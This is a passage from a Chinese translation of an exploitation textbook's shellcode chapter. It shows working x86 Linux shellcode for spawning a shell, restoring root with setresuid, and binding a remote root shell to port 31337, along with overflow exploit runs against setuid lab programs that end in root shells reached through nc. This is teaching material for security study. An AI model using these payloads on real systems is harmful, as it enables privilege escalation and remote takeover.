  push ebx          ; Push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  mov al, 11        ; Syscall #11.
  int 0x80          ; Do it.

这个 shellcode 在栈上构建了以 null 结尾的字符串"/bin//sh"，然后复制 ESP 作为指针。多余的反斜杠无关紧要，并且实际上会被忽略。同样的方法用于构建剩余参数的数组。结果 shellcode 仍然会启动一个 shell，但只有 25 字节，而使用jmp调用方法则是 36 字节。

reader@hacking:~/booksrc $ nasm tiny_shell.s 
reader@hacking:~/booksrc $ wc -c tiny_shell
25 tiny_shell
reader@hacking:~/booksrc $ hexdump -C tiny_shell
00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 50  |1.Ph//shh/bin..P|
00000010  89 e2 53 89 e1 b0 0b cd  80                       |..S......|
00000019
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xcb\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#

权限问题

为了帮助缓解权限提升的泛滥，一些特权进程在执行不需要那种访问权限的事情时，会降低其有效权限。这可以通过seteuid()函数来完成，该函数将设置有效用户 ID。通过更改有效用户 ID，可以改变进程的权限。seteuid()函数的手册页如下所示。

SETEGID(2)                 Linux Programmer's Manual                SETEGID(2)

NAME
       seteuid, setegid - set effective user or group ID

SYNOPSIS
       #include <sys/types.h>
       #include <unistd.h>

       int seteuid(uid_t euid);
       int setegid(gid_t egid);

DESCRIPTION
       seteuid() sets the effective user ID of the current process.
       Unprivileged user processes may only set the effective user ID to
       ID to the real user ID, the effective user ID or the saved set-user-ID.
       Precisely the same holds for setegid() with "group" instead of "user".

RETURN VALUE
       On success, zero is returned. On error, -1 is returned, and errno is
       set appropriately.

此函数在以下代码中用于在调用有漏洞的strcpy()之前将权限降低到“games”用户。

drop_privs.c

#include <unistd.h>
void lowered_privilege_function(unsigned char *ptr) {
   char buffer[50];
   seteuid(5);  // Drop privileges to games user.
   strcpy(buffer, ptr);
}
int main(int argc, char *argv[]) {
   if (argc > 0)
      lowered_privilege_function(argv[1]);
}

尽管这个编译后的程序被设置为 root 的 setuid，但在 shellcode 执行之前，权限被降低到 games 用户。这只为 games 用户启动了一个 shell，而没有 root 访问权限。

reader@hacking:~/booksrc $ gcc -o drop_privs drop_privs.c
reader@hacking:~/booksrc $ sudo chown root ./drop_privs; sudo chmod u+s ./drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xcb\xf9\xff\xbf"x40')
sh-3.2$ whoami
games
sh-3.2$ id
uid=999(reader) gid=999(reader) euid=5(games)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),
104(scan
ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3.2$

幸运的是，我们可以在 shellcode 的开始处通过系统调用来恢复权限，将权限设置回 root。最完整的方法是使用setresuid()系统调用来设置真实、有效和保存的用户 ID。系统调用号和手册页如下所示。

reader@hacking:~/booksrc $ grep -i setresuid /usr/include/asm-i386/unistd.h
`#define __NR_setresuid          164`
#define __NR_setresuid32        208
reader@hacking:~/booksrc $ man 2 setresuid
 SETRESUID(2)               Linux Programmer's Manual              SETRESUID(2)

NAME
       setresuid, setresgid - set real, effective and saved user or group ID

SYNOPSIS
       #define _GNU_SOURCE
       #include <unistd.h>

       int setresuid(uid_t ruid, uid_t euid, uid_t suid);
       int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

DESCRIPTION
       setresuid() sets the real user ID, the effective user ID, and the saved
       set-user-ID of the current process.

以下 shellcode 在启动 shell 之前调用setresuid()来恢复 root 权限。

priv_shell.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);
  xor eax, eax      ; Zero out eax.
  xor ebx, ebx      ; Zero out ebx.
  xor ecx, ecx      ; Zero out ecx.
  xor edx, edx      ; Zero out edx.
  mov al,  0xa4     ; 164 (0xa4) for syscall #164
  int 0x80          ; setresuid(0, 0, 0)  Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])
  xor eax, eax      ; Make sure eax is zeroed again.
  mov al, 11        ; syscall #11
  push ecx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push ecx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

这样，即使程序在利用时以降低的权限运行，shellcode 也可以恢复权限。以下通过以降低的权限利用相同的程序来演示这种效果。

reader@hacking:~/booksrc $ nasm priv_shell.s
reader@hacking:~/booksrc $ export SHELLCODE=$(cat priv_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff9bf
reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')
sh-3.2# whoami
root
sh-3.2# id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),
104(scan
ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3.2#

更小了

这段 Shellcode 还可以进一步减少几个字节。有一个单字节x86 指令叫做cdq，代表将双字转换为四字。这个指令不使用操作数，总是从 EAX 寄存器获取源数据，并将结果存储在 EDX 和 EAX 寄存器之间。由于寄存器是 32 位双字，需要两个寄存器来存储 64 位四字。转换仅仅是将 32 位整数的符号位扩展到 64 位整数。从操作的角度来看，这意味着如果 EAX 的符号位是0，cdq指令将清零 EDX 寄存器。使用xor来清零 EDX 寄存器需要两个字节；所以，如果 EAX 已经是零，使用cdq指令来清零 EDX 将节省一个字节

	`31 D2`            xor edx,edx

相比于

	`99`               cdq

通过巧妙地使用堆栈，还可以节省一个字节。由于堆栈是 32 位对齐的，向堆栈推送的单字节值将被对齐为双字。当这个值被弹出时，它将被符号扩展，填充整个寄存器。推送单个字节并将其弹回到寄存器的指令需要三个字节，而使用xor来清零寄存器和移动单个字节需要四个字节

	`31 C0`            xor eax,eax
	`B0 0B`            mov al,0xb

相比于

	`6A 0B`            push byte +0xb
	`58`               pop eax

这些技巧（以粗体显示）在下面的 Shellcode 列表中使用。这些汇编成与上一章中使用的相同的 Shellcode。

shellcode.s

BITS 32

; setresuid(uid_t ruid, uid_t euid, uid_t suid);
  xor eax, eax      ; Zero out eax.
  xor ebx, ebx      ; Zero out ebx.
  xor ecx, ecx      ; Zero out ecx.
  `cdq               ; Zero out edx using the sign bit from eax.`
  mov BYTE al, 0xa4 ; syscall 164 (0xa4)
  int 0x80          ; setresuid(0, 0, 0)  Restore all root privs.

; execve(const char *filename, char *const argv [], char *const envp[])
  `push BYTE 11      ; push 11 to the stack.   pop eax           ; pop the dword of 11 into eax.`
  push ecx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push ecx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

推送单个字节的语法需要声明大小。有效的大小有BYTE表示一个字节，WORD表示两个字节，DWORD表示四个字节。这些大小可以从寄存器宽度中推断出来，因此将数据移动到 AL 寄存器意味着BYTE大小。虽然不是所有情况下都需要使用大小，但这并不妨碍，并且可以帮助提高可读性。

端口绑定 Shellcode

当利用远程程序时，我们迄今为止设计的 Shellcode 将不起作用。注入的 Shellcode 需要通过网络进行通信以提供交互式 root 提示符。端口绑定 Shellcode 将 Shell 绑定到监听传入连接的网络端口。在上一章中，我们使用这种 Shellcode 来利用 tinyweb 服务器。下面的 C 代码绑定到端口 31337 并监听 TCP 连接。

端口绑定 Shellcode

bind_port.c

#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void) {
   int sockfd, new_sockfd;  // Listen on sock_fd, new connection on new_fd
   struct sockaddr_in host_addr, client_addr;   // My address information
   socklen_t sin_size;
   int yes=1;

   sockfd = socket(PF_INET, SOCK_STREAM, 0);

   host_addr.sin_family = AF_INET;         // Host byte order
   host_addr.sin_port = htons(31337);      // Short, network byte order
   host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
   memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));

   listen(sockfd, 4);
   sin_size = sizeof(struct sockaddr_in);
   new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
}

这些熟悉的套接字函数都可以通过单个 Linux 系统调用访问，这个系统调用被恰当地命名为socketcall()。这是系统调用号 102，它的手册页有些晦涩。

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd.h
#define __NR_socketcall         102
reader@hacking:~/booksrc $ man 2 socketcall
IPC(2)                     Linux Programmer's Manual                     IPC(2)

NAME
       socketcall - socket system calls

SYNOPSIS
       int socketcall(int call, unsigned long *args);

DESCRIPTION
       socketcall() is a common kernel entry point for the socket system calls. call
       determines which socket function to invoke. args points to a block containing
       the actual arguments, which are passed through to the appropriate call.

       User programs should call  the  appropriate  functions  by  their  usual
       names.   Only  standard  library implementors and kernel hackers need to
       know about socketcall().

首个参数的可能调用号列在linux/net.h包含文件中。

来自 /usr/include/linux/net.h

#define SYS_SOCKET  1   /* sys_socket(2)    */
#define SYS_BIND  2   /* sys_bind(2)      */
#define SYS_CONNECT 3   /* sys_connect(2)   */
#define SYS_LISTEN  4   /* sys_listen(2)    */
#define SYS_ACCEPT  5   /* sys_accept(2)    */
#define SYS_GETSOCKNAME 6   /* sys_getsockname(2)   */
#define SYS_GETPEERNAME 7   /* sys_getpeername(2)   */
#define SYS_SOCKETPAIR  8   /* sys_socketpair(2)    */
#define SYS_SEND  9   /* sys_send(2)      */
#define SYS_RECV  10    /* sys_recv(2)      */
#define SYS_SENDTO  11    /* sys_sendto(2)    */
#define SYS_RECVFROM  12    /* sys_recvfrom(2)    */
#define SYS_SHUTDOWN  13    /* sys_shutdown(2)    */
#define SYS_SETSOCKOPT  14    /* sys_setsockopt(2)    */
#define SYS_GETSOCKOPT  15    /* sys_getsockopt(2)    */
#define SYS_SENDMSG 16    /* sys_sendmsg(2)   */
#define SYS_RECVMSG 17    /* sys_recvmsg(2)   */

因此，为了使用 Linux 进行套接字系统调用，EAX 总是102对于socketcall()，EBX 包含套接字调用的类型，而 ECX 是指向套接字调用参数的指针。这些调用很简单，但其中一些需要sockaddr结构，这必须由 Shellcode 构建。通过调试编译的 C 代码是最直接查看这种结构在内存中的方法。

reader@hacking:~/booksrc $ gcc -g bind_port.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 18
13         sockfd = socket(PF_INET, SOCK_STREAM, 0);
14
15         host_addr.sin_family = AF_INET;         // Host byte order
16         host_addr.sin_port = htons(31337);      // Short, network byte order
17         host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
18         memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.
19
20         bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
21
22         listen(sockfd, 4);
(gdb) break 13
Breakpoint 1 at 0x804849b: file bind_port.c, line 13.
(gdb) break 20
Breakpoint 2 at 0x80484f5: file bind_port.c, line 20.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at bind_port.c:13
13         sockfd = socket(PF_INET, SOCK_STREAM, 0);
(gdb) x/5i $eip
0x804849b <main+23>:    mov    DWORD PTR [esp+8],0x0
0x80484a3 <main+31>:    mov    DWORD PTR [esp+4],0x1
0x80484ab <main+39>:    mov    DWORD PTR [esp],0x2
0x80484b2 <main+46>:    call   0x8048394 <socket@plt>
0x80484b7 <main+51>:    mov    DWORD PTR [ebp-12],eax
(gdb)

第一个断点发生在套接字调用之前，因为我们需要检查PF_INET和SOCK_STREAM的值。所有三个参数都是按相反顺序推入堆栈的（但使用mov指令）。这意味着PF_INET是2，SOCK_STREAM是1。

(gdb) cont
Continuing.

Breakpoint 2, main () at bind_port.c:20
20         bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},
  sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)
$2 = 16
(gdb) x/16xb &host_addr
0xbffff780:     `0x02    0x00    0x7a    0x69    0x00    0x00    0x00    0x00`
0xbffff788:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb)

下一个断点发生在sockaddr结构体填充值之后。当打印host_addr时，调试器足够智能以解码结构体的元素，但现在你需要足够聪明，意识到端口号以网络字节序存储。sin_family和sin_port元素都是单词，后面跟着一个DWORD地址。在这种情况下，地址是0，这意味着可以使用任何地址进行绑定。之后的剩余八个字节只是结构体中的额外空间。结构体中的前八个字节（以粗体显示）包含所有重要信息。

以下汇编指令执行了绑定到端口 31337 和接受 TCP 连接所需的全部套接字调用。sockaddr结构体和参数数组都是通过将值以相反顺序推入堆栈，然后将 ESP 复制到 ECX 中创建的。sockaddr结构体的最后八个字节实际上没有推入堆栈，因为它们没有被使用。堆栈上随机出现的八个字节将占据这个空间，这是可以的。

bind_port.s

BITS 32

; s = socket(2, 1, 0)
  push BYTE 0x66    ; socketcall is syscall #102 (0x66).
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.

  mov esi, eax      ; save socket FD in esi for later

; bind(s, [2, 31337, 0], 16)
  push BYTE 0x66    ; socketcall (syscall #102)
  pop eax
  inc ebx           ; ebx = 2 = SYS_BIND = bind()
  push edx          ; Build sockaddr struct:  INADDR_ANY = 0
  push WORD 0x697a  ;   (in reverse order)    PORT = 31337
  push WORD bx      ;                         AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = 0 on success

; listen(s, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx
  inc ebx           ; ebx = 4 = SYS_LISTEN = listen()
  push ebx          ; argv: { backlog = 4,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80

; c = accept(s, 0, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()
  push edx          ; argv: { socklen = 0,
  push edx          ;         sockaddr ptr = NULL,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = connected socket FD

当汇编并用于攻击时，此 shellcode 将绑定到端口 31337 并等待传入的连接，在accept调用处阻塞。当建立连接时，新的套接字文件描述符将放在此代码的 EAX 寄存器中。这实际上直到与前面描述的 shell 创建代码结合使用时才有用。幸运的是，标准文件描述符使得这种融合变得非常简单。

复制标准文件描述符

标准输入、标准输出和标准错误是程序执行标准输入输出所使用的三个标准文件描述符。套接字也是如此，它们是可以被读取和写入的文件描述符。通过简单地将创建的 shell 的输入、输出和错误标准文件描述符与连接的套接字文件描述符交换，shell 就会将输出和错误写入套接字，并从套接字接收的字节中读取输入。有一个专门用于复制文件描述符的系统调用，称为dup2。这是系统调用编号 63。

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd.h
#define __NR_dup2                63
reader@hacking:~/booksrc $ man 2 dup2
DUP(2)                     Linux Programmer's Manual                     DUP(2)

NAME
       dup, dup2 - duplicate a file descriptor

SYNOPSIS
       #include <unistd.h>
       int dup(int oldfd);
       int dup2(int oldfd, int newfd);

DESCRIPTION
       dup() and dup2() create a copy of the file descriptor oldfd.

       dup2() makes newfd be the copy of oldfd, closing newfd first if necessary.

bind_port.s shellcode 在 EAX 寄存器中留下连接的套接字文件描述符。在文件 bind_shell_beta.s 中添加了以下指令以将此套接字复制到标准 I/O 文件描述符中；然后调用 tiny_shell 指令在当前进程中执行 shell。创建的 shell 的标准输入和输出文件描述符将是 TCP 连接，允许远程 shell 访问。

从 bind_shell1.s 的新指令

; dup2(connected socket, {all three standard I/O file descriptors})
  mov ebx, eax      ; Move socket FD in ebx.
  push BYTE 0x3F    ; dup2  syscall #63
  pop eax
  xor ecx, ecx      ; ecx = 0 = standard input
  int 0x80          ; dup(c, 0)
  mov BYTE al, 0x3F ; dup2  syscall #63
  inc ecx           ; ecx = 1 = standard output
  int 0x80          ; dup(c, 1)
  mov BYTE al, 0x3F ; dup2  syscall #63
  inc ecx           ; ecx = 2 = standard error
  int 0x80          ; dup(c, 2)

; execve(const char *filename, char *const argv [], char *const envp[])
  mov BYTE al, 11   ; execve  syscall #11
  push edx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push ecx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr.
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

当这段 shellcode 被汇编并用于攻击时，它将绑定到端口 31337 并等待传入的连接。在下面的输出中，grep 被用来快速检查空字节。最后，进程挂起等待连接。

reader@hacking:~/booksrc $ nasm bind_shell_beta.s
reader@hacking:~/booksrc $ hexdump -C bind_shell_beta | grep --color=auto 00
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  89 c6 6a 66 58 43 52 66  68 7a 69 66 53 89 e1 6a  |..jfXCRfhzifS..j|
00000020  10 51 56 89 e1 cd 80 b0  66 43 43 53 56 89 e1 cd  |.QV.....fCCSV...|
00000030  80 b0 66 43 52 52 56 89  e1 cd 80 89 c3 6a 3f 58  |..fCRRV......j?X|
00000040  31 c9 cd 80 b0 3f 41 cd  80 b0 3f 41 cd 80 b0 0b  |1....?A...?A....|
00000050  52 68 2f 2f 73 68 68 2f  62 69 6e 89 e3 52 89 e2  |Rh//shh/bin..R..|
00000060  53 89 e1 cd 80                                    |S....|
00000065
reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff97f
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x7f\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------

在另一个终端窗口中，使用 netstat 程序来查找监听端口。然后，使用 netcat 连接到该端口的 root shell。

reader@hacking:~/booksrc $ sudo netstat -lp | grep 31337
tcp        0      0   *:31337          *:*            LISTEN     25604/notesearch
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root

分支控制结构

C 编程语言的控制结构，如 for 循环和 if-then-else 块，由机器语言中的条件分支和循环组成。使用控制结构，dup2的重复调用可以被缩减为一个循环中的单个调用。在前面章节中编写的第一个 C 程序使用了 for 循环来向世界问候 10 次。反汇编主函数将显示编译器如何使用汇编指令实现 for 循环。循环指令（如下所示，加粗）位于函数前导指令之后，为局部变量i保存栈内存。这个变量相对于 EBP 寄存器被引用为[ebp-4]。

reader@hacking:~/booksrc $ gcc firstprog.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048374 <main+0>:    push   ebp
0x08048375 <main+1>:    mov    ebp,esp
0x08048377 <main+3>:    sub    esp,0x8
0x0804837a <main+6>:    and    esp,0xfffffff0
0x0804837d <main+9>:    mov    eax,0x0
0x08048382 <main+14>:   sub    esp,eax
`0x08048384 <main+16>:   mov    DWORD PTR [ebp-4],0x0 0x0804838b <main+23>:   cmp    DWORD PTR [ebp-4],0x9 0x0804838f <main+27>:   jle    0x8048393 <main+31> 0x08048391 <main+29>:   jmp    0x80483a6 <main+50>`
0x08048393 <main+31>:   mov    DWORD PTR [esp],0x8048484
0x0804839a <main+38>:   call   0x80482a0 <printf@plt>
`0x0804839f <main+43>:   lea    eax,[ebp-4] 0x080483a2 <main+46>:   inc    DWORD PTR [eax] 0x080483a4 <main+48>:   jmp    0x804838b <main+23>`
0x080483a6 <main+50>:   leave
0x080483a7 <main+51>:   ret
End of assembler dump.
(gdb)

循环包含两个新的指令：cmp（比较）和jle（如果小于或等于则跳转），后者属于条件跳转指令家族。cmp指令将比较其两个操作数，并根据结果设置标志。然后，条件跳转指令将根据标志进行跳转。在上面的代码中，如果[ebp-4]中的值小于或等于 9，执行将跳转到0x8048393，跳过下一个jmp指令。否则，下一个jmp指令将执行跳转到函数末尾的0x080483a6，退出循环。循环体调用printf()，增加[ebp-4]处的计数器变量，并最终跳回比较指令以继续循环。使用条件跳转指令，可以在汇编中创建复杂的编程控制结构，如循环。下面显示了更多的条件跳转指令。

指令	描述
`cmp <dest>, <source>`	比较目标操作数与源操作数，根据结果设置标志，用于条件跳转指令。
`je <target>`	如果比较的值相等则跳转到目标。
`jne <target>`	如果不相等则跳转。
`jl <target>`	如果小于则跳转。
`jle <target>`	如果小于或等于则跳转。
`jnl <target>`	如果不小于则跳转。
`jnle <target>`	如果不小于或等于则跳转。
`jg jge`	如果大于，或大于等于则跳转。
`jng jnge`	如果不大于，或不大于等于则跳转。

这些指令可以用来将 shellcode 中的dup2部分缩减到以下内容：

; dup2(connected socket, {all three standard I/O file descriptors})
  mov ebx, eax      ; Move socket FD in ebx.
  xor eax, eax      ; Zero eax.
  xor ecx, ecx      ; ecx = 0 = standard input
`dup_loop:   mov BYTE al, 0x3F ; dup2  syscall #63   int 0x80          ; dup2(c, 0)   inc ecx   cmp BYTE cl, 2        ; Compare ecx with 2.   jle dup_loop      ; If ecx <= 2, jump to dup_loop.`

这个循环从 0 迭代到 2，每次调用 dup2。通过对 cmp 指令使用的标志的更完整理解，这个循环可以进一步缩短。由 cmp 指令设置的标志也被大多数其他指令设置，描述了指令结果的属性。这些标志包括进位标志 (CF)、奇偶标志 (PF)、调整标志 (AF)、溢出标志 (OF)、零标志 (ZF) 和符号标志 (SF)。最后两个标志最有用且最容易理解。如果结果是零，则零标志设置为真，否则为假。符号标志简单地是结果的最重要位，如果结果是负数则设置为真，否则为假。这意味着，在执行任何产生负结果的指令后，符号标志变为真，而零标志变为假。

Abbreviation	Name	Description
ZF	零标志	如果结果是零则为真。
SF	符号标志	如果结果是负数（等于结果的最重要位）则为真。

cmp（比较）指令实际上只是一个 sub（减法）指令，它丢弃了结果，只影响状态标志。jle（如果小于或等于则跳转）指令实际上是在检查零和符号标志。如果这两个标志中的任何一个为真，则目标（第一个）操作数小于或等于源（第二个）操作数。其他条件跳转指令以类似的方式工作，并且还有更多直接检查单个状态标志的条件跳转指令：

Instruction	Description
`jz <target>`	如果零标志被设置，则跳转到目标。
`jnz <target>`	如果零标志没有被设置，则跳转。
`js <target>`	如果符号标志被设置，则跳转。
`jns <target>`	如果符号标志没有被设置，则跳转。

带着这些知识，如果循环的顺序被反转，可以完全删除 cmp（比较）指令。从 2 开始计数向下，可以检查符号标志直到 0。缩短后的循环如下所示，变化以粗体显示。

; dup2(connected socket, {all three standard I/O file descriptors})
  mov ebx, eax      ; Move socket FD in ebx.
  xor eax, eax      ; Zero eax.
  `push BYTE 0x2     ; ecx starts at 2.   pop ecx`
dup_loop:
  mov BYTE al, 0x3F ; dup2  syscall #63
  int 0x80          ; dup2(c, 0)
  `dec ecx           ; Count down to 0.   jns dup_loop      ; If the sign flag is not set, ecx is not negative.`

循环之前的前两个指令可以使用 xchg（交换）指令缩短。这个指令交换源和目标操作数之间的值：

Instruction	Description
`xchg <dest>, <source>`	交换两个操作数之间的值。

这条单独的指令可以替换以下两条指令，它们占用四个字节：

	89 C3              mov ebx,eax
	31 C0              xor eax,eax

EAX 寄存器需要被清零以仅清除寄存器的最高三个字节，而 EBX 已经清除了这些最高字节。所以交换 EAX 和 EBX 之间的值可以一石二鸟，将大小减少到以下单字节指令：

	93                 xchg eax,ebx

由于xchg指令实际上比两个寄存器之间的mov指令要小，因此它可以用来缩小其他地方的 shellcode。自然，这仅在源操作数的寄存器不重要的情况下才有效。以下版本的绑定端口 shellcode 使用了交换指令来进一步减少其大小。

bind_shell.s

BITS 32

; s = socket(2, 1, 0)
  push BYTE 0x66    ; socketcall is syscall #102 (0x66).
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; Ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.

  xchg esi, eax     ; Save socket FD in esi for later.

; bind(s, [2, 31337, 0], 16)
  push BYTE 0x66    ; socketcall (syscall #102)
  pop eax
  inc ebx           ; ebx = 2 = SYS_BIND = bind()
  push edx          ; Build sockaddr struct:  INADDR_ANY = 0
  push WORD 0x697a  ;   (in reverse order)    PORT = 31337
  push WORD bx      ;                         AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = 0 on success

; listen(s, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx
  inc ebx           ; ebx = 4 = SYS_LISTEN = listen()
  push ebx          ; argv: { backlog = 4,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80

; c = accept(s, 0, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()
  push edx          ; argv: { socklen = 0,
  push edx          ;         sockaddr ptr = NULL,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})
  xchg eax, ebx     ; Put socket FD in ebx and 0x00000005 in eax.
  push BYTE 0x2     ; ecx starts at 2.
  pop ecx
dup_loop:
  mov BYTE al, 0x3F ; dup2  syscall #63
  int 0x80          ; dup2(c, 0)
  dec ecx           ; count down to 0
  jns dup_loop      ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])
  mov BYTE al, 11   ; execve  syscall #11
  push edx          ; push some nulls for string termination.
  push 0x68732f2f   ; push "//sh" to the stack.
  push 0x6e69622f   ; push "/bin" to the stack.
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp.
  push edx          ; push 32-bit null terminator to stack.
  mov edx, esp      ; This is an empty array for envp.
  push ebx          ; push string addr to stack above null terminator.
  mov ecx, esp      ; This is the argv array with string ptr
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

这编译成与上一章中使用的 92 字节 bind_shell shellcode 相同的 bind_shell shellcode。

reader@hacking:~/booksrc $ nasm bind_shell.s 
reader@hacking:~/booksrc $ hexdump -C bind_shell
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 52 66 68  7a 69 66 53 89 e1 6a 10  |.jfXCRfhzifS..j.|
00000020  51 56 89 e1 cd 80 b0 66  43 43 53 56 89 e1 cd 80  |QV.....fCCSV....|
00000030  b0 66 43 52 52 56 89 e1  cd 80 93 6a 02 59 b0 3f  |.fCRRV.....j.Y.?|
00000040  cd 80 49 79 f9 b0 0b 52  68 2f 2f 73 68 68 2f 62  |..Iy...Rh//shh/b|
00000050  69 6e 89 e3 52 89 e2 53  89 e1 cd 80              |in..R..S....|
0000005c
reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode

连接回 Shellcode

端口绑定 shellcode 很容易被防火墙挫败。大多数防火墙会阻止入站连接，除非是已知服务的特定端口。这限制了用户的暴露，并将防止端口绑定 shellcode 接收连接。软件防火墙现在如此普遍，端口绑定 shellcode 在野外实际工作的机会很小。

